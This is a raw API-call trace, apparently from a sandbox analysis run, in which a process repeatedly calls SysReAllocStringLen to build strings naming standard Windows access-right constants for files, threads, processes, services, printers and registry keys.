[0130.587] SysReAllocStringLen (in: pbstr=0x298e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e960*="WRITE_OWNER") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e950*="WRITE_DAC") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x298e940*="SECTION_EXTEND_SIZE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x298e930*="FILE_MAP_READ") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x298e920*="FILE_MAP_WRITE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x298e910*="FILE_MAP_COPY") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x298e900*="FILE_MAP_ALL_ACCESS") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e8d0*="STANDARD_RIGHTS_READ") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e8b0*="DELETE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e8a0*="READ_CONTROL") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e890*="WRITE_OWNER") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e880*="WRITE_DAC") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x298e870*="MUTEX_MODIFY_STATE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x298e860*="MUTEX_ALL_ACCESS") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e840*="STANDARD_RIGHTS_WRITE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e830*="STANDARD_RIGHTS_READ") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e820*="STANDARD_RIGHTS_ALL") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e810*="DELETE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e800*="READ_CONTROL") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e7f0*="WRITE_OWNER") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e7e0*="WRITE_DAC") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x298e7d0*="EVENT_MODIFY_STATE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x298e7c0*="EVENT_ALL_ACCESS") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e790*="STANDARD_RIGHTS_READ") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e780*="STANDARD_RIGHTS_ALL") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e770*="DELETE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e760*="READ_CONTROL") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e750*="WRITE_OWNER") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e740*="WRITE_DAC") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x298e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x298e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e700*="STANDARD_RIGHTS_WRITE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e6f0*="STANDARD_RIGHTS_READ") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e6d0*="DELETE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e6c0*="READ_CONTROL") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e6b0*="WRITE_OWNER") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e6a0*="WRITE_DAC") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x298e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x298e680*="JOB_OBJECT_TERMINATE") returned 1
[0130.588] SysReAllocStringLen (in: pbstr=0x298e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x298e670*="JOB_OBJECT_QUERY") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x298e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x298e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x298e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e620*="STANDARD_RIGHTS_WRITE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e610*="STANDARD_RIGHTS_READ") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e600*="STANDARD_RIGHTS_ALL") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e5f0*="DELETE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e5e0*="READ_CONTROL") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e5d0*="WRITE_OWNER") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e5c0*="WRITE_DAC") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x298e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x298e5a0*="THREAD_IMPERSONATE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x298e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x298e580*="THREAD_QUERY_INFORMATION") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x298e570*="THREAD_SET_INFORMATION") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x298e560*="THREAD_SET_CONTEXT") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x298e550*="THREAD_GET_CONTEXT") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x298e540*="THREAD_SUSPEND_RESUME") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x298e530*="THREAD_TERMINATE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x298e520*="THREAD_ALL_ACCESS") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e500*="STANDARD_RIGHTS_WRITE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e4f0*="STANDARD_RIGHTS_READ") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e4d0*="DELETE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e4c0*="READ_CONTROL") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e4b0*="WRITE_OWNER") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e4a0*="WRITE_DAC") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x298e490*="PROCESS_QUERY_INFORMATION") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x298e480*="PROCESS_SET_INFORMATION") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x298e470*="PROCESS_SET_QUOTA") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x298e460*="PROCESS_CREATE_PROCESS") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x298e450*="PROCESS_DUP_HANDLE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x298e440*="PROCESS_VM_WRITE") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x298e430*="PROCESS_VM_READ") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x298e420*="PROCESS_VM_OPERATION") returned 1
[0130.589] SysReAllocStringLen (in: pbstr=0x298e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x298e410*="PROCESS_SET_SESSIONID") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x298e400*="PROCESS_CREATE_THREAD") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x298e3f0*="PROCESS_TERMINATE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x298e3e0*="PROCESS_ALL_ACCESS") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e3b0*="STANDARD_RIGHTS_READ") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e390*="DELETE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e380*="READ_CONTROL") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e370*="WRITE_OWNER") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e360*="WRITE_DAC") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x298e350*="PERM_FILE_CREATE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x298e340*="PERM_FILE_WRITE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x298e330*="PERM_FILE_READ") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e310*="STANDARD_RIGHTS_WRITE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e300*="STANDARD_RIGHTS_READ") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e2e0*="DELETE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e2d0*="READ_CONTROL") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e2c0*="WRITE_OWNER") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e2b0*="WRITE_DAC") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x298e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x298e290*="PRINTER_ACCESS_USE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x298e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x298e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x298e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x298e250*="PRINTER_ALL_ACCESS") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x298e240*="PRINTER_EXECUTE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x298e230*="PRINTER_WRITE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x298e220*="PRINTER_READ") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x298e210*="PRINTER_ALL_ACCESS") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e200*="DELETE") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e1f0*="READ_CONTROL") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e1e0*="WRITE_OWNER") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e1d0*="WRITE_DAC") returned 1
[0130.590] SysReAllocStringLen (in: pbstr=0x298e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x298e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x298e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x298e1a0*="SC_MANAGER_LOCK") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x298e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x298e180*="SC_MANAGER_CONNECT") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x298e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x298e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e140*="STANDARD_RIGHTS_WRITE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e130*="STANDARD_RIGHTS_READ") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e120*="STANDARD_RIGHTS_ALL") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e110*="DELETE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e100*="READ_CONTROL") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298e0f0*="WRITE_OWNER") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298e0e0*="WRITE_DAC") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x298e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x298e0c0*="SERVICE_STOP") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x298e0b0*="SERVICE_START") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x298e0a0*="SERVICE_QUERY_STATUS") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x298e090*="SERVICE_QUERY_CONFIG") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x298e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x298e070*="SERVICE_INTERROGATE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x298e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x298e050*="SERVICE_CHANGE_CONFIG") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x298e040*="SERVICE_ALL_ACCESS") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e020*="STANDARD_RIGHTS_WRITE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e010*="STANDARD_RIGHTS_READ") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e000*="STANDARD_RIGHTS_ALL") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298dff0*="DELETE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298dfe0*="READ_CONTROL") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298dfd0*="WRITE_OWNER") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298dfc0*="WRITE_DAC") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x298dfb0*="KEY_SET_VALUE") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x298dfa0*="KEY_CREATE_LINK") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x298df90*="KEY_CREATE_SUB_KEY") returned 1
[0130.591] SysReAllocStringLen (in: pbstr=0x298df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x298df80*="KEY_NOTIFY") returned 1
